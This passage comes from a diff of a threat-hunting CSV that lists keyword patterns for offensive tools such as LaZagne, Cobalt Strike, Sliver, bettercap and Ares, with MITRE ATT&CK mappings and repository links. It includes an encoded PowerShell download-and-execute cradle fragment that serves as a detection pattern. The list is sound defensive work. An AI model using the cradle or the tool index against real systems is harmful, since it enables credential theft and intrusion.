Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*appdata*\Windows:svchost.exe*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*appdata*\Windows:winrm.vbs*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" -"*applenotes2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*Applet_ReverseTCP.jar*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*Application.Lazagne.H*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8527","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"*applenotes2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*Applet_ReverseTCP.jar*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*Application.Lazagne.H*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" "*applocker_enum*","offensive_tool_keyword","cobaltstrike","A Visual Studio template used to create Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/securifybv/Visual-Studio-BOF-template","1","1","N/A","10","10","210","46","2021-11-17T12:03:42Z","2021-11-13T13:44:01Z" "*applocker-enumerator*","offensive_tool_keyword","cobaltstrike","A Visual Studio template used to create Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - 
T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/securifybv/Visual-Studio-BOF-template","1","1","N/A","10","10","210","46","2021-11-17T12:03:42Z","2021-11-13T13:44:01Z" "*apt install crunch*","offensive_tool_keyword","crunch","Generate a dictionary file containing words with a minimum and maximum length","T1596 - T1596.001","TA0043","N/A","N/A","Credential Access","https://sourceforge.net/projects/crunch-wordlist/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*apt install gpp-decrypt*","offensive_tool_keyword","gpp-decrypt","Decrypt the given Group Policy Preferences","T1552.002 - T1212","TA0009 - TA0006","N/A","N/A","Credential Access","https://gitlab.com/kalilinux/packages/gpp-decrypt","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*apt install hyperion*","offensive_tool_keyword","hyperion","A runtime PE-Crypter - The crypter is started via the command line and encrypts an input executable with AES-128. 
The encrypted file decrypts itself on startup (bruteforcing the AES key which may take a few seconds)","T1027.002 - T1059.001 - T1116","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://www.kali.org/tools/hyperion/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*apt install polenum*","offensive_tool_keyword","polenum","Uses Impacket Library to get the password policy from a windows machine","T1012 - T1596","TA0009 - TA0007","N/A","N/A","Discovery","https://salsa.debian.org/pkg-security-team/polenum","1","0","N/A","8","10","N/A","N/A","N/A","N/A" -"*apt install set -y*","offensive_tool_keyword","social-engineer-toolkit","The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. SET is a product of TrustedSec","T1566 - T1598","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/trustedsec/social-engineer-toolkit","1","0","N/A","N/A","10","9394","2569","2023-08-25T17:25:45Z","2012-12-31T22:01:33Z" +"*apt install set -y*","offensive_tool_keyword","social-engineer-toolkit","The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. 
SET is a product of TrustedSec","T1566 - T1598","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/trustedsec/social-engineer-toolkit","1","0","N/A","N/A","10","9395","2569","2023-08-25T17:25:45Z","2012-12-31T22:01:33Z" "*apt install wce*","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://www.kali.org/tools/wce/","1","0","N/A","8","4","N/A","N/A","N/A","N/A" "*APT stands for Advanced Persistence Tomato*","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","0","N/A","9","2","129","24","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z" -"*apt* install john*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*apt* install john*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*apt/etumbot.py*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration 
simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*apt/putterpanda.py*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*apt1_virtuallythere.profile*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" 
"*APT64/EternalHushFramework*","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","1","N/A","10","10","140","21","2023-09-21T19:04:41Z","2023-07-09T09:13:21Z" -"*apt-get -y install tor *","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","0","N/A","7","10","2417","268","2023-07-14T10:59:10Z","2019-03-28T18:07:05Z" +"*apt-get -y install tor *","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","0","N/A","7","10","2419","268","2023-07-14T10:59:10Z","2019-03-28T18:07:05Z" "*APTortellini/unDefender*","offensive_tool_keyword","unDefender","Killing your preferred antimalware by abusing native symbolic links and NT paths.","T1562.001 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/APTortellini/unDefender","1","1","N/A","10","4","309","78","2022-01-29T12:35:31Z","2021-08-21T14:45:39Z" -"*APTSimulator*","offensive_tool_keyword","APTSimulator","APT Simulator is a Windows Batch script that uses a set of tools and output files to make a system look as if it was compromised. In contrast to other adversary simulation tools. APT Simulator is deisgned to make the application as simple as possible. You don't need to run a web server. 
database or any agents on set of virtual machines. Just download the prepared archive. extract and run the contained Batch file as Administrator. Running APT Simulator takes less than a minute of your time.","T1036 - T1059 - T1562 - T1027 - T1003","TA0001 - TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/NextronSystems/APTSimulator","1","1","N/A","N/A","10","2272","414","2023-06-16T08:48:25Z","2018-02-03T14:19:42Z" +"*APTSimulator*","offensive_tool_keyword","APTSimulator","APT Simulator is a Windows Batch script that uses a set of tools and output files to make a system look as if it was compromised. In contrast to other adversary simulation tools. APT Simulator is deisgned to make the application as simple as possible. You don't need to run a web server. database or any agents on set of virtual machines. Just download the prepared archive. extract and run the contained Batch file as Administrator. Running APT Simulator takes less than a minute of your time.","T1036 - T1059 - T1562 - T1027 - T1003","TA0001 - TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/NextronSystems/APTSimulator","1","1","N/A","N/A","10","2271","414","2023-06-16T08:48:25Z","2018-02-03T14:19:42Z" "*apypykatz.py*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" "*aQBlAHgAIAAoAE4AZwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMgAvAHIAZQB2AC4AcABzADEAJwApAA*","offensive_tool_keyword","JustEvadeBro","JustEvadeBro a cheat sheet which will aid you through AMSI/AV evasion & bypasses.","T1562.001 - T1055.012 - T1218.011","TA0005 - TA0040 - TA0010","N/A","N/A","Defense Evasion","https://github.com/sinfulz/JustEvadeBro","1","0","N/A","8","3","260","25","2023-03-30T06:22:24Z","2021-05-11T06:26:10Z" 
-"*aquatone*","offensive_tool_keyword","aquatone","Aquatone is a tool for visual inspection of websites across a large amount of hosts and is convenient for quickly gaining an overview of HTTP-based attack surface.","T1590 - T1553 - T1002 - T1083 - T1313","TA0009 - TA0002 - TA0007","N/A","N/A","Web Attacks","https://github.com/michenriksen/aquatone","1","0","N/A","N/A","10","5265","876","2022-05-22T19:49:32Z","2015-11-19T11:30:12Z" -"*archerysec*","offensive_tool_keyword","archerysec","Archery is an opensource vulnerability assessment and management tool which helps developers and pentesters to perform scans and manage vulnerabilities. Archery uses popular opensource tools to perform comprehensive scanning for web application and network. It also performs web application dynamic authenticated scanning and covers the whole applications by using selenium. The developers can also utilize the tool for implementation of their DevOps CI/CD environment.","T1190 - T1082 - T1518","TA0003 - TA0008","N/A","N/A","Frameworks","https://github.com/archerysec/archerysec","1","0","N/A","N/A","10","2135","507","2023-09-26T14:45:31Z","2017-12-04T12:42:54Z" +"*aquatone*","offensive_tool_keyword","aquatone","Aquatone is a tool for visual inspection of websites across a large amount of hosts and is convenient for quickly gaining an overview of HTTP-based attack surface.","T1590 - T1553 - T1002 - T1083 - T1313","TA0009 - TA0002 - TA0007","N/A","N/A","Web Attacks","https://github.com/michenriksen/aquatone","1","0","N/A","N/A","10","5266","876","2022-05-22T19:49:32Z","2015-11-19T11:30:12Z" +"*archerysec*","offensive_tool_keyword","archerysec","Archery is an opensource vulnerability assessment and management tool which helps developers and pentesters to perform scans and manage vulnerabilities. Archery uses popular opensource tools to perform comprehensive scanning for web application and network. 
It also performs web application dynamic authenticated scanning and covers the whole applications by using selenium. The developers can also utilize the tool for implementation of their DevOps CI/CD environment.","T1190 - T1082 - T1518","TA0003 - TA0008","N/A","N/A","Frameworks","https://github.com/archerysec/archerysec","1","0","N/A","N/A","10","2135","507","2023-10-04T02:00:32Z","2017-12-04T12:42:54Z" "*archive-*.kali.org/*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*ArchStrike*","offensive_tool_keyword","archstrike","Arch Linux repo containing lots of exploitation tools for pentesters","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://archstrike.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*ares.py runserver*","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","0","N/A","10","10","1439","523","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z" -"*ares-master.zip*","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","1","N/A","10","10","1439","523","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z" +"*ares.py runserver*","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","0","N/A","10","10","1439","524","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z" 
+"*ares-master.zip*","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","1","N/A","10","10","1439","524","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z" "*Args_Invoke_Kerberoast*","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/tevora-threat/SharpView/","1","0","N/A","10","9","850","206","2021-12-17T15:53:20Z","2018-07-24T21:15:04Z" "*armitage.exe*","offensive_tool_keyword","armitage","Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets. recommends exploits and exposes the advanced capabilities of the framework ","T1210 - T1059.003 - T1547.001 - T1057 - T1046 - T1562.001 - T1071.001 - T1060 - T1573.002","TA0002 - TA0008 - TA0005 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t0v3rr1d3/armitage","1","1","N/A","N/A","1","81","15","2022-12-06T00:17:23Z","2022-01-23T17:32:01Z" -"*armory install *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*armory install .net-execute*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - 
TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*armory install .net-pivot*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*armory install .net-recon*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*armory install situational-awareness*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*armory install windows-bypass*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - 
TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*armory install windows-pivot*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" +"*armory install *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*armory install .net-execute*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*armory install .net-pivot*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - 
TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*armory install .net-recon*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*armory install situational-awareness*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*armory install windows-bypass*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*armory install windows-pivot*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - 
TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" "*Arno0x/DBC2*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*Arno0x/EmbedInHTML*","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","1","N/A","N/A","5","458","144","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" "*Arno0x/WebDavC2*","offensive_tool_keyword","WebDavC2","WebDavC2 is a PoC of using the WebDAV protocol with PROPFIND only requests to serve as a C2 communication channel between an agent. running on the target system. 
and a controller acting as the actuel C2 server.","T1571 - T1210.001 - T1190","TA0003 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Arno0x/WebDavC2","1","0","N/A","10","10","116","72","2019-08-27T06:51:42Z","2017-09-07T14:00:28Z" -"*arp.spoof on*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" -"*arp.spoof.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" -"*arp.spoof.targets*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" -"*arp_spoof.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - 
